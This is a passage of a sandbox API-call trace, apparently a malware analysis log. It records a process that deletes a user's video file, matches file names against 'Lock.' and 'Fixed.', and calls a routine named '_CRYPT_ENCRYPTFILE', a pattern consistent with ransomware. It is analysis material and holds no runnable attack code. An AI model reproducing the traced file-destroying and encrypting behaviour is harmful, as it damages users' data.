lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.684] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/0FMiSmnvsI1v8s.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf", lpFilePart=0x8cedf4*="0FMiSmnvsI1v8s.swf") returned 0x29 [0257.684] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf" (normalized: "c:\\users\\fd1hvy\\videos\\0fmismnvsi1v8s.swf")) returned 0x20 [0257.684] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ff9bd0, ftCreationTime.dwHighDateTime=0x1d5e6d7, ftLastAccessTime.dwLowDateTime=0xa302c9c0, ftLastAccessTime.dwHighDateTime=0x1d5e770, ftLastWriteTime.dwLowDateTime=0xa302c9c0, ftLastWriteTime.dwHighDateTime=0x1d5e770, nFileSizeHigh=0x0, nFileSizeLow=0x90f2, dwReserved0=0x1, dwReserved1=0x1c, cFileName="0FMiSmnvsI1v8s.swf", cAlternateFileName="0FMISM~1.SWF")) returned 0xa873d0 [0257.684] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf" (normalized: "c:\\users\\fd1hvy\\videos\\0fmismnvsi1v8s.swf")) returned 1 [0257.686] FindNextFileW (in: hFindFile=0xa873d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ff9bd0, ftCreationTime.dwHighDateTime=0x1d5e6d7, ftLastAccessTime.dwLowDateTime=0xa302c9c0, ftLastAccessTime.dwHighDateTime=0x1d5e770, ftLastWriteTime.dwLowDateTime=0xa302c9c0, ftLastWriteTime.dwHighDateTime=0x1d5e770, nFileSizeHigh=0x0, nFileSizeLow=0x90f2, dwReserved0=0x1, dwReserved1=0x1c, cFileName="0FMiSmnvsI1v8s.swf", cAlternateFileName="0FMISM~1.SWF")) returned 0 [0257.686] FindClose (in: hFindFile=0xa873d0 | out: hFindFile=0xa873d0) returned 1 [0257.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0257.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0257.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0257.687] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.687] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x9787d0 [0257.688] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/0FMiSmnvsI1v8s.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf", lpFilePart=0x8cf650*="0FMiSmnvsI1v8s.swf") returned 0x29 [0257.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0257.688] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\0FMiSmnvsI1v8s.swf" (normalized: "c:\\users\\fd1hvy\\videos\\0fmismnvsi1v8s.swf")) returned 0xffffffff [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0257.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0257.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0257.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0257.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0257.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0257.763] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0257.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0257.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.764] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0257.764] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0257.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0257.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0257.765] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0257.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0257.765] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0257.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x9787d0 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0257.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0257.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0257.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0257.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0257.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0257.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0257.768] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0257.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0257.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0257.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0257.768] 